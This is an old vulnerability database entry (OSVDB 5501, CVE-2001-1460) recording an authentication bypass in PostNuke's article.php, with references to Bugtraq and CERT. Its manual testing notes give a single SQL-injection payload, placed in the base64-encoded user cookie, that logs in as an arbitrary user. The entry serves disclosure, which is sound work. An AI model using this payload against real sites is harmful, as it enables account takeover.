PostNuke getusrinfo Authentication Bypass

2001-10-12T00:00:00
ID OSVDB:5501
Type osvdb
Reporter OSVDB
Modified 2001-10-12T00:00:00

Description

Technical Description

This issue appears to have been discovered twice, and never patched correctly.

Manual Testing Notes

http://[victim]/article.php?save=1&sid=20&[ANY SID]cookieusrtime=160000&user=USERID:USERNAME:' or uname='USERNAME [base64_encoded]

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-10/0088.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-03/0199.html
ISS X-Force ID: 8481
ISS X-Force ID: 7280
CVE-2001-1460
CERT VU: 921547
Bugtraq ID: 3435
Bugtraq ID: 4302